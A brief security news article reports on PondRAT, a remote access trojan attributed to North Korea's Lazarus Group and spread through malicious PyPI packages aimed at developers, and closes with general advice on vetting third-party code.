data breaches
New PondRAT Malware Hidden in Python Packages Targets Software Developers in Latest Supply Chain Attack
A newly discovered strain of malware, PondRAT, has been found hidden in Python packages on the PyPI repository, posing a serious threat to software developers, especially those working on macOS and Linux systems. This attack, attributed to North Korean threat actors linked to the notorious Lazarus Group, is part of a broader campaign targeting developers through supply chain attacks.
PondRAT is a remote access trojan (RAT) that allows attackers to upload and download files, execute arbitrary commands, and pause operations on infected systems. The malware was found in several seemingly legitimate Python packages, such as “real-ids,” “coloredtxt,” and “beautifultext,” which unsuspecting developers might have downloaded and installed from PyPI. Once these packages are installed, they retrieve the malicious PondRAT payload from a remote server and compromise the developer’s system.
This attack is particularly concerning because it targets the software supply chain, potentially giving attackers access not only to individual developers but also to the broader network of vendors and customers reliant on compromised code. This kind of infiltration could lead to widespread disruptions and data breaches.
PondRAT is closely related to another piece of malware, POOLRAT, and both share similar capabilities. The Lazarus Group’s ongoing activities demonstrate a high level of sophistication in leveraging open-source platforms like PyPI for malicious purposes. The removal of the infected packages from the repository has mitigated immediate threats, but this incident underscores the need for developers and organizations to strengthen their security practices. Vetting third-party code, using private repositories, and implementing advanced threat detection tools are key steps to protect against such attacks.
In this evolving threat landscape, vigilance is critical for developers to safeguard their systems and the broader supply chain against future attacks. This incident serves as a stark reminder of the growing risks in the open-source ecosystem.
Sources:
- The Hacker News(The Hacker News)
- HivePro(Hive Pro)
- Foresiet(Foresiet)
- CyberSRC(CyberSRCC)